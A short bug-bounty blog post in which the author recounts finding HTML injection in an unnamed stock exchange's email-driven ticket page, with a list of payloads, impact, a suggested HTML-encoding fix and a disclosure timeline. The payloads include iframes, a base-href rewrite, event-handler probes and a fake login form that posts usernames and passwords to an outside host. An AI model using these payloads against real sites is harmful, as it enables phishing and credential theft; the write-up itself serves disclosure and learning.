Open in app

Sign up

Sign in

Write

Sign up

Sign in

My first bug | Html injection|

Pandeyrishu
System Weakness
Published in
2 min readFeb 7, 2024

--

I reported a bug in the stock exchange company I don't want to disclose the name of company so I use a name for it "target".

It was my first non duplicate valid bug .

Description

HTML injection is a type of attack where malicious HTML code is inserted into a website.

Steps To Reproduce

  • The target receive complain through email and creat a ticket that shown in website.
  • So I sent this payload to the target through email and see the ticket in the website.
  • I found that the payload is triggered

Payloads:-
<button type="button">Click Me!</button>
<canvas id="myCanvas">draw htmli</canvas>
<caption>Html</caption>
<cite>Html Html</cite>
<code>Html</code>
<head><base href="https://www.google.com" target="_blank"></head>
<span style="color:blue;font-weight:bold">html</span>
<abbr title="HTML">HTML</abbr>
<acronym title="Armour Infosec">AI</acronym>
<address>address,address</address>
<iframe id="if1" src="https://www.google.com"></iframe>
<iframe id="if2" src="https://www.google.com"></iframe>
<<h1>HTML</h1>
<<h1>HTML</h1>>

<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
<div style="text-align: center;"><form Method="POST" Action="http://www.test.com/">
Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
<br /></form></div></body></html>
<input><input"/onmouseover="confirm(3333);//"onload=onload><input><innerHTML><img src="https://www.petmd.com/sites/default/files/Acute-Dog-Diarrhea-47066074.jpg" width="1000" height="750" alt="onmouseover=prompt(1);//" /></a></input>

  • The last payload creats a phishing page on website.
  • Impact
    HTML injection is a type of attack where malicious HTML code is inserted into a website that lead to lose of reputation and data dump by executing much more commands .

Suggested Fix

HTML encoding: HTML encoding is the process of converting HTML characters, such as < and >, into their corresponding character entities, such as &lt; and &gt;. This can help prevent HTML injection attacks by ensuring that user-submitted data is treated as plain text rather than HTML code.

> I reported the bug on 4th February .

> I got respons on 7 February that the bug was informational and they provide me some swags.

> On 20 February I received swags from company

Technology
Cybersecurity
Bug Bounty
Bug Bounty Tips
Penetration Testing

--

--

Pandeyrishu
System Weakness
Follow

Written by Pandeyrishu

5 Followers
Follow

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams